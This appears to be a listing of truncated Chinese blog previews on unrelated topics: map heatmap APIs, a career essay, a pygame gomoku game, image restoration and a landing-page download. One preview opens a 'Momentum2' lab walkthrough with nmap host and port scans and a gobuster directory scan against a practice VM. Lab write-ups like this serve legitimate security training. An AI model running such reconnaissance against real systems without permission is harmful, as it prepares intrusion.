百度地图和高德地图的JavaScript API都提供了热力图的绘制方法&#xff0c;都是将热力图作为新的图层&#xff0c;叠加到地图上。但是百度地图的经纬度体系与我们的经纬度存在偏差&#xff0c;高德的与我们相符&#xff0c;应当使用高德地图JavaScript API。 因为是JavaScript…

一个人被锁死在公司底层的根本原因

一、现代社会对员工角色的认知 随着经济全球化和科技进步,现代社会对员工的认知发生了深刻的变化。传统上,员工被视为公司的执行者和生产者,承担着重复性、机械性的工作。然而,随着知识经济和服务型经济的兴起,员工角色逐渐从“执行者”转变为“创造者”和“合作者”。员…

python-分享篇-五子棋

文章目录 代码效果 代码 """五子棋之人机对战"""import sys import random import pygame from pygame.locals import * import pygame.gfxdraw from checkerboard import Checkerboard, BLACK_CHESSMAN, WHITE_CHESSMAN, offset, PointSIZE 3…

CSRNET图像修复,DNN

CSRNET图像修复 CSRNET图像修复&#xff0c;只需要OPENCV的DNN

Momentum2

攻击机 192.168.223.128 目标机 192.168.223.147 主机发现 nmap -sP 192.168.223.0/24 端口扫描 nmap -sV -A -p- 192.168.223.147 开启了22 80 端口 看一下web界面 源码&#xff0c;robots.txt ,url都观察了一下好像没什么有用信息 扫一下目录 gobuster dir -u http:…

H5 树叶飘动二次元引导页源码

H5 树叶飘动二次元引导页源码 源码介绍&#xff1a;一款H5 树叶飘动二次元引导页源码&#xff0c;带有很多可选跳转按钮。 下载地址&#xff1a; https://www.changyouzuhao.cn/10386.html